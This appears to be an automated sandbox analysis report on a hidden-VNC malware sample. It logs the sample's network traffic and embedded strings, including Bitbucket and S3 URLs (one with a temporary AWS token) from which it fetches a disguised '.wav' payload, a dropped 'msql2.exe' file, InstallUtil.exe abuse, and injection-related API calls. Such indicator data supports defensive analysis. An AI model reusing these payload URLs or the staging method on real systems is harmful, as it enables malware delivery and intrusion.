Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-4b4c-8f05-9171e7fe5496/Pkvloobmwfh.wav?response-content-disposition=attachment%3B%20filename%3D%22Pkvloobmwfh.wav%22&AWSAccessKeyId=ASIA6KOSE3BNAIEU5YMO&Signature=Y%2BkNCurOwDf4%2BG0%2FzFFY6FKruwo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEGgaCXVzLWVhc3QtMSJHMEUCIQC57jwP7qZA9s0cFKU9SBdzO9gQeLtilBP0Cm4JQ7SzDwIgGSyDJhK3XDy%2FupW9ssflW2rOIhtc0AjilHnow0HTkOAqsAIIwf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDP7HIFwzluVBCF7xRyqEAlm9JYPO9gnDehGXhbbznEnybAZn4AZLgEtNIQ6VF%2FoLeFJuQ%2BOaS5KY4lmEPGee2M9B1T%2FjxP5DPE4kaKIdpDTInWbrJ2ryzbGFg%2BeSSGJbasIqfkNdrFpx3CTtFfMhaNFzevzbe%2Flg9QZQe8m4x1hG%2BoT87oMeLNm7iUJ9A1RNfcaWVJbPmJpu1FbCPpQkwgwUSYVzFy9azroRq%2F0AvFuB%2FWdtnrDsBU5OsbHsrW6b%2BD1YuhfE6J33vaODmQ34LEvEVBmTKl0hegCUEvguNZSxnZDWE1rCr4mG1a1gCmL%2F83%2BBE5bT2Rx0WHPbmBaFl3zV7z%2BaTvHohiudbjzu2lxK4GL8MLDer7gGOp0B6WPmCyzfFSOpj11132NvmtOlkGdSiZaqMvlRur4y3jtnp6a2s6LoeIGX29%2ByeL8IubT21iWiWhSklANWpFyfPfPP5OEBDF%2BlyxiGIehkTL26uiKY3kAHIryh7iJFv0VuIUt07crkH0eAmDVJFqIFB%2FobXbaO6Cp1Yiuc9uYnO5H3zZRYZ54YiHLQAEWdHg66zcndFJk0Yubvvg6WAg%3D%3D&Expires=1728837176 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: bitbucket.org
Source: global traffic	DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com

Source: InstallUtil.exe, 00000001.00000002.4146654495.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: InstallUtil.exe, 00000001.00000002.4146654495.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: InstallUtil.exe, 00000001.00000002.4168769540.00000000055B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d3522d218ade2
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E97000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003507000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/871bd1b6-687a-41cd-a5b2-a3b47218f627/downloads/b257e69b-6ad2-
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.00000000034CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr	String found in binary or memory: https://bitbucket.org/312351234123/12312312412adsada/downloads/Pkvloobmwfh.wav
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr	String found in binary or memory: https://github.com/mariuszgromada/MathParser.org-mXparser
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1948776469.0000000004747000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
Source: msql2.exe.0.dr	String found in binary or memory: https://mathparser.org
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr	String found in binary or memory: https://mathparser.org/mxparser-license
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr	String found in binary or memory: https://mathparser.org/mxparser-tutorial/confirming-non-commercial-commercial-usecWARNING:
Source: msql2.exe.0.dr	String found in binary or memory: https://mathparser.org/order-commercial-license
Source: msql2.exe.0.dr	String found in binary or memory: https://payhip.com/infima
Source: hvnc-CR-SCR-0710.bin.exe, msql2.exe.0.dr	String found in binary or memory: https://payhip.com/infima)
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2092862640.0000000002A45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1738812637.00000000040AC000.00000004.00000800.00020000.00000000.sdmp, hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1744159647.0000000006450000.00000004.08000000.00040000.00000000.sdmp, msql2.exe, 00000002.00000002.1884022395.0000000003BEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000001.00000002.4149515832.00000000028F5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4149515832.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2020798393.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002E93000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.30.95:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.90.148:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.232.1:443 -> 192.168.2.4:49743 version: TLS 1.2

System Summary

.NET source code contains very large array initializations

Source: 0.2.hvnc-CR-SCR-0710.bin.exe.4447550.5.raw.unpack, Record.cs

Large array initialization: PatchPage: array initializer size 295456

.NET source code contains very large strings

Source: hvnc-CR-SCR-0710.bin.exe, ValStructWorker.cs

Long String: Length: 10317

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064FFC10 NtResumeThread,	0_2_064FFC10
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064FE288 NtProtectVirtualMemory,	0_2_064FE288
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064FFC0A NtResumeThread,	0_2_064FFC0A
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064FE280 NtProtectVirtualMemory,	0_2_064FE280
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060FFC10 NtResumeThread,	2_2_060FFC10
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060FE288 NtProtectVirtualMemory,	2_2_060FE288
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060FFC0A NtResumeThread,	2_2_060FFC0A
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060FE280 NtProtectVirtualMemory,	2_2_060FE280
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AFFC10 NtResumeThread,	5_2_06AFFC10
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AFE288 NtProtectVirtualMemory,	5_2_06AFE288
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AFFC0A NtResumeThread,	5_2_06AFFC0A
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 5_2_06AFE280 NtProtectVirtualMemory,	5_2_06AFE280

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_02DF78A0	0_2_02DF78A0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_02DF2930	0_2_02DF2930
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_02DFE648	0_2_02DFE648
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_02DFD060	0_2_02DFD060
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_02DF3751	0_2_02DF3751
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_02DF3760	0_2_02DF3760
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_06434410	0_2_06434410
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_06430A00	0_2_06430A00
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_06430D37	0_2_06430D37
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_06432018	0_2_06432018
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064A7390	0_2_064A7390
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064A5610	0_2_064A5610
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064A5690	0_2_064A5690
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064A56A0	0_2_064A56A0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064A7380	0_2_064A7380
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064A0040	0_2_064A0040
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064A0006	0_2_064A0006
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064A7939	0_2_064A7939
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064E9EE0	0_2_064E9EE0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064E9EF0	0_2_064E9EF0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064FB548	0_2_064FB548
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064F6AF0	0_2_064F6AF0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064F8088	0_2_064F8088
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064FB538	0_2_064FB538
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064F1278	0_2_064F1278
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064F7210	0_2_064F7210
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064F6ADF	0_2_064F6ADF
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064F52A8	0_2_064F52A8
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064F52A5	0_2_064F52A5
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_064F8082	0_2_064F8082
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_0651877A	0_2_0651877A
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_06510040	0_2_06510040
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_06510006	0_2_06510006
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_06860007	0_2_06860007
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_06860040	0_2_06860040
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_068605C1	0_2_068605C1
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_068605D0	0_2_068605D0
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_068DD890	0_2_068DD890
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_068DCCA8	0_2_068DCCA8
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_068C0007	0_2_068C0007
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Code function: 0_2_068C0040	0_2_068C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00E04010	1_2_00E04010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00E015A8	1_2_00E015A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00E01598	1_2_00E01598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00E03DDB	1_2_00E03DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C7F40	1_2_056C7F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C7F50	1_2_056C7F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C7F20	1_2_056C7F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056CD668	1_2_056CD668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C2E28	1_2_056C2E28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C7E88	1_2_056C7E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056CB920	1_2_056CB920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056CB910	1_2_056CB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C99E0	1_2_056C99E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C99F9	1_2_056C99F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C4320	1_2_056C4320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C430F	1_2_056C430F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_056C9A08	1_2_056C9A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06910D75	1_2_06910D75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_069121A0	1_2_069121A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06911EDF	1_2_06911EDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06911F10	1_2_06911F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06912190	1_2_06912190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06948860	1_2_06948860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06964E64	1_2_06964E64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06967C77	1_2_06967C77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06962B51	1_2_06962B51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06980040	1_2_06980040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06980267	1_2_06980267
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_069800AF	1_2_069800AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06980073	1_2_06980073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0698019D	1_2_0698019D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_0698011D	1_2_0698011D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_06993780	1_2_06993780
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_00F778A0	2_2_00F778A0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_00F72960	2_2_00F72960
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_00F7E648	2_2_00F7E648
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_00F7D060	2_2_00F7D060
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_00F73760	2_2_00F73760
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_00F73751	2_2_00F73751
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_06034410	2_2_06034410
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_06030A00	2_2_06030A00
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_06030D37	2_2_06030D37
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_06032018	2_2_06032018
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060A7390	2_2_060A7390
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060A569F	2_2_060A569F
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060A56A0	2_2_060A56A0
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060A7387	2_2_060A7387
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060A0006	2_2_060A0006
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060A0040	2_2_060A0040
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060A7947	2_2_060A7947
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060E8F49	2_2_060E8F49
Source: C:\Users\user\AppData\Roaming\msql2.exe	Code function: 2_2_060E8F58	2_2_060E8F58
